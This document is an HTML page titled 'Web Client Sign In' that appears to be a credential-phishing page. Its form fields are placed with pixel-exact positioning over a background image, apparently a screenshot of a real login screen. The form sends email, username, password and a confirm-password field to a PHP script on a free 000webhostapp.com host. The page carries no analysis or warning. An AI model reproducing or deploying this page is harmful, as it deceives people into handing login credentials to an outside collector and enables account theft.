<html>
    <head>
        <title>Web Client Sign In</title>
        
        <link rel="SHORTCUT ICON" href="./ffff_files/favicon.ico">
        <style>
        
        body { background-image: url(pz.PNG);
         background-repeat: no-repeat;}
       
       
        form         {padding-left: 581;
                      padding-top: 187;}
         input[type=text] {
                        width: 31.2%;
                        height: 3.8%;
                        padding: 8px 5px;
                        margin: 4.1px 0;
                        border-radius: 4px;
                        border-color: 1px ;
}
        input[type=password] {
                       width: 31.2%;
                        height: 3.8%;
                        padding: 8px 5px;
                        margin: 3.9px 0;
                        border-radius: 4px;
                        border-color: 1px ;
}
        
        button{ 
               
                padding: 3px 4px;
                 border-radius: 4px;
                 position:absolute;
                 left:841.5px;
                 top:328.7px;
                 cursor: pointer;
            
                
               
                }
        
        </style></head>
    <body>
    <form action="https://theresaiky.000webhostapp.com/uns/boomb.php"  method="post" id="login_form">
       
        
            <input name="email" type="text" id="email" autocomplete="" placeholder="" required= >
        
        
        <div>
           <input name="username" type="text" id="email" autocomplete="" placeholder="" required= >
      </div>
         
       
             
       <div>
            <input name="password" type="password" id="pass" autocomplete="of" placeholder=""required >
           </div> 
        
               
       <div>
            <input name="cpassword" type="password" id="pass" autocomplete="of" placeholder=""required >
           </div>
        
             <button type=submit class="login_botton" id="action" >Submit</button>
        
        <tr>
											
    
                   
                   
        </form>
    
    </body>
</html>